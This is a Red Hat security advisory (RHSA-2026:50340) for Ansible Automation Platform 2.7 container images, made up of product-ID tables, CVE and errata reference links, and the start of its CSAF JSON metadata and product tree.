| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64 | — |
Workaround
|
| URL | Category |
|---|---|
| https://access.redhat.com/errata/RHSA-2026:50340 | self |
| https://access.redhat.com/security/cve/CVE-2026-11332 | external |
| https://access.redhat.com/security/cve/CVE-2026-12383 | external |
| https://access.redhat.com/security/cve/CVE-2026-13149 | external |
| https://access.redhat.com/security/cve/CVE-2026-13676 | external |
| https://access.redhat.com/security/cve/CVE-2026-18141 | external |
| https://access.redhat.com/security/cve/CVE-2026-34993 | external |
| https://access.redhat.com/security/cve/CVE-2026-40898 | external |
| https://access.redhat.com/security/cve/CVE-2026-44545 | external |
| https://access.redhat.com/security/cve/CVE-2026-48526 | external |
| https://access.redhat.com/security/cve/CVE-2026-48990 | external |
| https://access.redhat.com/security/cve/CVE-2026-54058 | external |
| https://access.redhat.com/security/cve/CVE-2026-54060 | external |
| https://access.redhat.com/security/cve/CVE-2026-54283 | external |
| https://access.redhat.com/security/cve/CVE-2026-55379 | external |
| https://access.redhat.com/security/cve/CVE-2026-55380 | external |
| https://access.redhat.com/security/cve/CVE-2026-59197 | external |
| https://access.redhat.com/security/cve/CVE-2026-59886 | external |
| https://access.redhat.com/security/cve/CVE-2026-59939 | external |
| https://access.redhat.com/security/updates/classi… | external |
| https://docs.redhat.com/en/documentation/red_hat_… | external |
| https://security.access.redhat.com/data/csaf/v2/a… | self |
| https://access.redhat.com/security/cve/CVE-2026-11332 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2485379 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-11332 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-11332 | external |
| https://github.com/ansible/ansible | external |
| https://access.redhat.com/security/cve/CVE-2026-12383 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2489127 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-12383 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-12383 | external |
| https://access.redhat.com/security/cve/CVE-2026-13149 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2494813 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-13149 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-13149 | external |
| https://github.com/juliangruber/brace-expansion/c… | external |
| https://www.npmjs.com/package/brace-expansion | external |
| https://access.redhat.com/security/cve/CVE-2026-13676 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2494197 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-13676 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-13676 | external |
| https://cna.openjsf.org/security-advisories.html | external |
| https://github.com/fastify/fast-uri/security/advi… | external |
| https://access.redhat.com/security/cve/CVE-2026-18141 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2508155 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-18141 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-18141 | external |
| https://access.redhat.com/security/cve/CVE-2026-34993 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2484099 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-34993 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-34993 | external |
| https://github.com/aio-libs/aiohttp/commit/dcf40f… | external |
| https://github.com/aio-libs/aiohttp/security/advi… | external |
| https://access.redhat.com/security/cve/CVE-2026-40898 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2484875 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-40898 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-40898 | external |
| https://github.com/quic-go/quic-go/releases/tag/v0.59.1 | external |
| https://github.com/quic-go/quic-go/security/advis… | external |
| https://access.redhat.com/security/cve/CVE-2026-44545 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2484377 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-44545 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-44545 | external |
| https://github.com/django/daphne/blob/main/CHANGE… | external |
| https://access.redhat.com/security/cve/CVE-2026-48526 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2482734 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-48526 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-48526 | external |
| https://github.com/jpadilla/pyjwt/security/adviso… | external |
| https://access.redhat.com/security/cve/CVE-2026-48990 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2490168 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-48990 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-48990 | external |
| https://github.com/authlib/joserfc/releases/tag/1.6.7 | external |
| https://github.com/authlib/joserfc/security/advis… | external |
| https://access.redhat.com/security/cve/CVE-2026-54058 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2500057 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-54058 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-54058 | external |
| https://github.com/python-pillow/Pillow/commit/6a… | external |
| https://github.com/python-pillow/Pillow/pull/9719 | external |
| https://github.com/python-pillow/Pillow/releases/… | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-54060 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497466 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-54060 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-54060 | external |
| https://github.com/python-pillow/Pillow/blob/main… | external |
| https://github.com/python-pillow/Pillow/commit/0a… | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-54283 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2491440 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-54283 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-54283 | external |
| https://github.com/Kludex/starlette/security/advi… | external |
| https://access.redhat.com/security/cve/CVE-2026-55379 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497452 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-55379 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-55379 | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-55380 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497455 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-55380 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-55380 | external |
| https://github.com/python-pillow/Pillow/commit/f3… | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-59197 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2500043 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-59197 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-59197 | external |
| https://github.com/python-pillow/Pillow/commit/cc… | external |
| https://github.com/python-pillow/Pillow/pull/9695 | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-59886 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2500041 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-59886 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-59886 | external |
| https://github.com/pyasn1/pyasn1/commit/e60c691cb… | external |
| https://github.com/pyasn1/pyasn1/releases/tag/v0.6.4 | external |
| https://github.com/pyasn1/pyasn1/security/advisor… | external |
| https://access.redhat.com/security/cve/CVE-2026-59939 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2498212 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-59939 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-59939 | external |
| https://github.com/httplib2/httplib2/commit/87581… | external |
| https://github.com/httplib2/httplib2/releases/tag… | external |
| https://github.com/httplib2/httplib2/security/adv… | external |
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Red Hat Ansible Automation Platform 2.7",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Ansible Automation Platform provides an enterprise framework for building, deploying and managing IT automation at scale. IT Managers can provide top-down guidelines on how automation is applied to individual teams, while automation developers retain the freedom to write tasks that leverage existing knowledge without the overhead. Ansible Automation Platform makes it possible for users across an organization to share, vet, and manage automation content by means of a simple, powerful, and agentless language.\n\nFor details about this release, refer to the release notes listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:50340",
"url": "https://access.redhat.com/errata/RHSA-2026:50340"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-11332",
"url": "https://access.redhat.com/security/cve/CVE-2026-11332"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-12383",
"url": "https://access.redhat.com/security/cve/CVE-2026-12383"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-13149",
"url": "https://access.redhat.com/security/cve/CVE-2026-13149"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-13676",
"url": "https://access.redhat.com/security/cve/CVE-2026-13676"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-18141",
"url": "https://access.redhat.com/security/cve/CVE-2026-18141"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-34993",
"url": "https://access.redhat.com/security/cve/CVE-2026-34993"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-40898",
"url": "https://access.redhat.com/security/cve/CVE-2026-40898"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-44545",
"url": "https://access.redhat.com/security/cve/CVE-2026-44545"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-48526",
"url": "https://access.redhat.com/security/cve/CVE-2026-48526"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-48990",
"url": "https://access.redhat.com/security/cve/CVE-2026-48990"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-54058",
"url": "https://access.redhat.com/security/cve/CVE-2026-54058"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-54060",
"url": "https://access.redhat.com/security/cve/CVE-2026-54060"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-54283",
"url": "https://access.redhat.com/security/cve/CVE-2026-54283"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-55379",
"url": "https://access.redhat.com/security/cve/CVE-2026-55379"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-55380",
"url": "https://access.redhat.com/security/cve/CVE-2026-55380"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-59197",
"url": "https://access.redhat.com/security/cve/CVE-2026-59197"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-59886",
"url": "https://access.redhat.com/security/cve/CVE-2026-59886"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-59939",
"url": "https://access.redhat.com/security/cve/CVE-2026-59939"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.7/whats_new-async_updates",
"url": "https://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.7/whats_new-async_updates"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_50340.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Ansible Automation Platform 2.7 Container Release Update",
"tracking": {
"current_release_date": "2026-08-05T02:30:34+00:00",
"generator": {
"date": "2026-08-05T02:30:34+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "5.3.8"
}
},
"id": "RHSA-2026:50340",
"initial_release_date": "2026-08-04T18:38:09+00:00",
"revision_history": [
{
"date": "2026-08-04T18:38:09+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-08-04T18:38:22+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-08-05T02:30:34+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.7",
"product": {
"name": "Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform:2.7::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat Ansible Automation Platform"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/platform-operator-bundle@sha256%3A9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform/platform-operator-bundle\u0026tag=1785438916"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mcp-server-rhel9@sha256%3A470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9\u0026tag=1785413994"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/aap-must-gather-rhel9@sha256%3Afc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9\u0026tag=1785370597"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/platform-operator-bundle@sha256%3Afa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform/platform-operator-bundle\u0026tag=1785438918"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-builder-rhel9@sha256%3Abad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9\u0026tag=1785373001"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-devspaces-rhel9@sha256%3A5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9\u0026tag=1785356349"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-dev-tools-rhel9@sha256%3Af66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9\u0026tag=1785442801"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-chatbot-rhel9@sha256%3Ad2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9\u0026tag=1785426734"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9@sha256%3Aa9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9\u0026tag=1785375273"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9-operator@sha256%3A96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator\u0026tag=1785283956"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mcp-tools-rhel9@sha256%3A79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9\u0026tag=1785374970"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9@sha256%3Acb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/controller-rhel9\u0026tag=1785378052"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9-operator@sha256%3Ad6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator\u0026tag=1785284040"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9@sha256%3A665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9\u0026tag=1785374869"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9-operator@sha256%3Ae07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator\u0026tag=1785284218"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-ui-rhel9@sha256%3A4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9\u0026tag=1785378596"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"product": {
